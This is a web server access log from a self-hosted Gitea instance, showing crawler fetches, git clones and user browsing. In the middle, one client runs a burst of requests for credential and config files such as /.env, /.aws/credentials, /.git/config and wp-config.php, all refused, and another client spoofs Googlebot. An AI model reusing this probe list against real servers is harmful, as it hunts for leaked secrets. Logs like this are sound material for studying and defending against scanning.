[Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10895] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 10896] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:22:42:10 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:22:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:22:42:14 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:01:45:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11616] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:01:45:32 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:02:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 885] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:03:26:07 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:03:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:03:26:07 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[16/Feb/2026:04:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 195.178.110.132] [Length 5677] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:44 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.env" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:04:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 195.178.110.132] [Length 88935] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/%22/assets/js/index.js?v=1.25.3\x22" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:04:02:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.env.bak" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:04:02:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.env.save" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.env.backup" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/backend/.env" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:04:02:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/admin/.env" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/wp-config.php" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/config.js" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/aws-config.js" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:04:02:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/aws.config.js" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/_debugbar/" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/debugbar/" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/debug/" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:04:02:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/phpinfo.php" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:04:02:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/info.php" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" -[16/Feb/2026:04:02:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/test.php" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.aws/credentials" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.aws/config" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/aws-credentials" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/aws.json" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.s3cfg" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.git/HEAD" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:04:02:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/.git/config" [Client 195.178.110.132] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:30:01 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 136.110.40.108] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" -[16/Feb/2026:05:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 136.110.40.108] [Length 5678] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" -[16/Feb/2026:05:30:06 +0000] - - 301 - GET http git.hanmocnn.co.kr "/wordpress/" [Client 136.110.40.108] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[16/Feb/2026:05:30:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/wordpress/" [Client 136.110.40.108] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[16/Feb/2026:05:42:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:42:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11613] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:05:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[16/Feb/2026:06:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 23.27.145.223] [Length 5676] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" -[16/Feb/2026:06:44:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 211.234.204.1] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 11615] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 211.234.204.1] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:44:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 211.234.204.1] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:06:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 211.234.204.1] 